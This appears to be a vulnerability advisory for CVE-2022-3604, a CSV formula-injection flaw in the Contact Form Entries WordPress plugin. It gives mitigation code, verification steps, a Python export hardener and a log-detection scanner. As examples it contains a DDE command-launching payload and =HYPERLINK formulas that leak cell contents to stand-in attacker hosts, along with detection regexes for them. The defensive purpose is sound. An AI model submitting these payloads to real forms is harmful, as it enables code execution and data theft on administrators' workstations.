CVE-2022-3604
📋 TL;DR
The Contact Form Entries WordPress plugin before version 1.3.0 writes submitted form values verbatim when exporting entries to CSV. A value that begins with a formula character (=, +, -, @) is therefore interpreted as a formula when the export is opened in Excel or LibreOffice Calc (CSV / formula injection). Any site visitor can submit such a value; the target is the administrator who downloads and opens the export.
💻 Affected Systems
- Contact Form Entries WordPress Plugin
📦 What is this software?
Contact Form Entries is a WordPress plugin that saves submissions from contact form plugins such as Contact Form 7 to the site database and lets administrators browse and export them, including as CSV.
⚠️ Risk & Real-World Impact
Worst Case
An attacker submits a form field such as =cmd|' /C calc'!A0 (a DDE call). When an administrator opens the export in Excel and accepts the application's security prompts, the formula launches an external program on the administrator's workstation, giving the attacker code execution in that user's context and a foothold for data theft or further compromise.
Likely Case
DDE payloads require the user to click through warnings, so the more realistic outcome is silent data exfiltration: a =HYPERLINK(...) or =WEBSERVICE(...) / =IMPORTXML(...) formula that concatenates neighbouring cells (other entries' names, e-mails, messages) into a URL under the attacker's control, or a phishing link that the administrator clicks from inside a trusted-looking spreadsheet.
If Mitigated
If the export neutralises leading formula characters (for example by prefixing an apostrophe or a tab, the conventional "treat as text" markers), the spreadsheet displays the submitted value as plain text and evaluates nothing. Note that CSV quoting alone is not a fix: Excel strips the quotes and still evaluates a field such as "=1+1".
🎯 Exploit Status
No authentication is needed: any visitor who can submit the contact form can plant a payload. It only fires when an administrator exports entries to CSV and opens the file in a spreadsheet application that evaluates formulas, and command-execution (DDE) payloads additionally require the administrator to accept the application's security prompts. No exploit tooling is required beyond a crafted form field.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.3.0
Vendor Advisory: https://wpscan.com/vulnerability/300ebfcd-c500-464e-b919-acfeb72593de/
Restart Required: No
Instructions:
1. Log into the WordPress admin panel.
2. Navigate to Plugins → Installed Plugins.
3. Find the 'Contact Form Entries' plugin.
4. Click 'Update Now' if an update is available.
5. Alternatively, download version 1.3.0 or later from the WordPress plugin repository and update manually.
🔧 Temporary Workarounds
Disable CSV Export
Temporarily disable CSV export in the plugin settings (or remove the export capability from all but a minimal set of users) until the site is patched.
Input Validation Filter
Neutralise formula triggers in contact form submissions before they reach the plugin. Note that sanitize_text_field() alone is not sufficient: it strips tags and whitespace but leaves a leading =, +, - or @ intact, so the value is still injectable. The filter below prefixes such values with an apostrophe so a spreadsheet reads them as text. It only covers Contact Form 7 submissions (the wpcf7_posted_data hook); if the plugin collects entries from other form plugins, apply the same treatment to their submission hooks. Stored values are altered (a phone number entered as +1 555 0100 is stored as '+1 555 0100), so treat this as a stop-gap.
Add to the theme's functions.php or a custom plugin:
add_filter('wpcf7_posted_data', function ($data) {
    // Prefix a leading formula character with an apostrophe; recurse into
    // array values (checkbox / multi-select fields).
    $neutralise = function ($value) use (&$neutralise) {
        if (is_array($value)) {
            return array_map($neutralise, $value);
        }
        return preg_replace('/^([=+\-@])/', "'$1", sanitize_text_field($value));
    };
    return array_map($neutralise, $data);
});
🧯 If You Can't Patch
- Disable the Contact Form Entries plugin entirely and use alternative form management solutions.
- Treat exported CSVs as untrusted: open them through the spreadsheet's text import dialog with every column typed as Text (LibreOffice Calc also offers an "Evaluate formulas" checkbox to leave unticked), keep Dynamic Data Exchange (DDE) server launch disabled in Excel's Trust Center under External Content, and do not click links inside an opened export.
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin → Plugins → Installed Plugins for 'Contact Form Entries' version. If version is below 1.3.0, the site is vulnerable.
Check Version:
wp plugin list --name='contact-form-entries' --field=version
Verify Fix Applied:
Confirm the plugin version is 1.3.0 or higher in the WordPress admin panel. Then submit a test entry whose field starts with a formula character, for example =HYPERLINK("http://example.com","test"), export the entries to CSV and open the file in a text editor rather than a spreadsheet. The leading character should have been neutralised (for example by a prefixed apostrophe) so that a spreadsheet would read the value as text; if the raw =HYPERLINK(...) still appears at the start of a field, the export is still injectable. Repeat with values starting with +, - and @.
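The following Python script is an added example, not code from the plugin or this advisory. It shows the two halves of the "If Mitigated" section and the verification step side by side: a CSV writer that mirrors the pre-1.3.0 behaviour (values written verbatim) next to a hardened writer that prefixes an apostrophe to any value a spreadsheet would evaluate, plus a scanner you can run over a downloaded export to check for injectable cells without opening the file in Excel or Calc. The sample entries are constructed for the example; the apostrophe-prefix technique is the conventional text marker, not necessarily the exact change shipped in 1.3.0.

```python
import csv
import io

# Leading characters that Excel / LibreOffice Calc treat as the start of a
# formula. Tab and carriage return are included because Excel honours them too.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample submissions for this example (not real entries). Two are
# classic CSV-injection payloads; the phone number shows the benign '+' case.
SAMPLE_ENTRIES = [
    {"name": "Alice", "email": "alice@example.com", "message": "Hello"},
    {"name": '=HYPERLINK("http://attacker.example/?"&A1,"click")',
     "email": "bob@example.com", "message": "+1 (555) 0100"},
    {"name": "Carol", "email": "carol@example.com",
     "message": "=cmd|' /C calc'!A0"},
]


def is_formula_cell(value: str) -> bool:
    """True if a spreadsheet would evaluate this cell instead of displaying it."""
    return value.startswith(FORMULA_TRIGGERS)


def neutralise(value: str) -> str:
    """Force the cell to be read as text by prefixing an apostrophe.

    CSV quoting alone is not enough: Excel strips the quotes and still
    evaluates a field such as "=1+1". The apostrophe is the conventional
    spreadsheet text marker and is hidden when the cell is displayed.
    """
    return "'" + value if is_formula_cell(value) else value


def export_csv(entries, hardened: bool) -> str:
    """Write entries as CSV text.

    hardened=False mirrors the pre-1.3.0 behaviour this page describes
    (values written verbatim); hardened=True neutralises formula triggers.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(["name", "email", "message"])
    for entry in entries:
        row = [entry["name"], entry["email"], entry["message"]]
        writer.writerow([neutralise(v) if hardened else v for v in row])
    return buf.getvalue()


def find_formula_cells(csv_text: str):
    """Return (row, column, value) for every cell a spreadsheet would evaluate.

    Run this over a downloaded export to verify a fix without opening the
    file in a spreadsheet; an empty result means no cell is injectable.
    """
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if is_formula_cell(cell):
                hits.append((r, c, cell))
    return hits


if __name__ == "__main__":
    print("vulnerable export:", find_formula_cells(export_csv(SAMPLE_ENTRIES, False)))
    print("hardened export:  ", find_formula_cells(export_csv(SAMPLE_ENTRIES, True)))
```

To check a real export, read the downloaded file and pass its contents to find_formula_cells(); the phone number in the sample shows why the check flags every leading +/-: the hardened export turns it into '+1 (555) 0100, which still displays correctly as text, and that loss of a numeric type is the accepted cost of making the export safe.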
📡 Detection & Monitoring
Log Indicators:
- Contact form submissions whose field values start with a formula character (=, +, -, @). A leading = followed by a function name or a DDE call (HYPERLINK, WEBSERVICE, IMPORTXML, cmd|) is high-confidence; a lone leading + or - is common in phone numbers and negative amounts, so treat those as low-confidence.
- Bursts of submissions from a single IP address, especially when several carry leading formula characters (an attacker seeding many entries so at least one lands in an export).
- On administrator workstations: a spreadsheet process (for example excel.exe or soffice.bin) spawning a shell or making outbound HTTP requests shortly after a CSV export was opened.
Network Indicators:
- POST requests to the contact form endpoint whose body contains a URL-encoded formula trigger (%3D, %2B, %40) at the start of a field value, followed by a function name.
- CSV downloads served by the plugin's export action. If your installation writes exports to disk (the page cites /wp-content/uploads/cf-entries/; confirm the path on your site), monitor that directory as well.
SIEM Query (Splunk-style; adapt the source and field names to your log pipeline). The regex keys on a field value that starts with "=" (raw or URL-encoded) followed by a function or DDE call, rather than alerting on every leading + or - sign:
source="wordpress" http_method="POST" ("contact-form-entries" OR "cf-entries" OR "wpcf7")
| regex _raw="(?i)(^|[&=\"])(%3D|=)\s*(HYPERLINK|CMD|DDE|WEBSERVICE|IMPORTXML|IMPORTDATA|EXEC)"
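The detection logic behind the indicators above, run over constructed log lines so it can be tuned before being ported to a SIEM. This is an added example, not part of the advisory: it decodes each POST body, flags every form field that starts with a formula trigger, grades the finding "high" when the value contains a function or DDE call typical of CSV injection and "low" otherwise (phone numbers, negative amounts), and lists IPs with repeated flagged submissions. The log format and the Contact Form 7 REST path in the sample lines are assumptions made for the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qs

# Leading-character check applied to each decoded form field value.
FORMULA_FIELD = re.compile(r"^[=+\-@\t\r]")
# Functions and DDE syntax typical of CSV-injection payloads; a match lifts a
# finding to "high", everything else (phone numbers, negative amounts) stays "low".
SUSPICIOUS = re.compile(r"HYPERLINK|DDE|cmd\||WEBSERVICE|IMPORTXML|IMPORTDATA", re.I)

# Assumed log format: client IP, request line in quotes, then the raw POST body.
# These four lines are constructed for this example; the Contact Form 7 REST
# path is only an illustrative assumption about where submissions land.
SAMPLE_LOG = [
    '203.0.113.5 "POST /wp-json/contact-form-7/v1/contact-forms/12/feedback" '
    'body="your-name=Alice&your-email=alice%40example.com&your-message=Hello"',
    '203.0.113.7 "POST /wp-json/contact-form-7/v1/contact-forms/12/feedback" '
    'body="your-name=%3DHYPERLINK%28%22http%3A%2F%2Fevil.example%2F%3F%22%26A1%2C%22x%22%29&your-message=hi"',
    '198.51.100.9 "POST /wp-json/contact-form-7/v1/contact-forms/12/feedback" '
    'body="your-name=Bob&your-message=%2B1+555+0100"',
    '198.51.100.9 "POST /wp-json/contact-form-7/v1/contact-forms/12/feedback" '
    'body="your-name=Eve&your-message=%3Dcmd%7C%27+%2FC+calc%27%21A0"',
]
LOG_RE = re.compile(r'^(?P<ip>\S+) "POST (?P<path>\S+)" body="(?P<body>[^"]*)"$')


def scan_line(line: str):
    """Decode the POST body and flag every field that starts with a formula trigger."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    for field, values in parse_qs(m["body"], keep_blank_values=True).items():
        for value in values:
            if FORMULA_FIELD.match(value):
                findings.append({
                    "ip": m["ip"],
                    "path": m["path"],
                    "field": field,
                    "value": value,
                    "severity": "high" if SUSPICIOUS.search(value) else "low",
                })
    return findings


def scan_log(lines):
    """Flatten findings across all log lines."""
    return [f for line in lines for f in scan_line(line)]


def repeat_offenders(findings, threshold: int = 2):
    """IPs with at least `threshold` flagged submissions (the burst indicator above)."""
    counts = Counter(f["ip"] for f in findings)
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f'{f["severity"]:4} {f["ip"]:14} {f["field"]}={f["value"]!r}')
    print("repeat offenders:", repeat_offenders(found))
```

Alert on "high" findings individually and on "low" findings only when repeat_offenders() fires; a single leading + in a phone number is noise, a run of them from one address is not. Note that the check runs on the decoded value, which is why the SIEM regex above has to match both the raw and the URL-encoded form of "=".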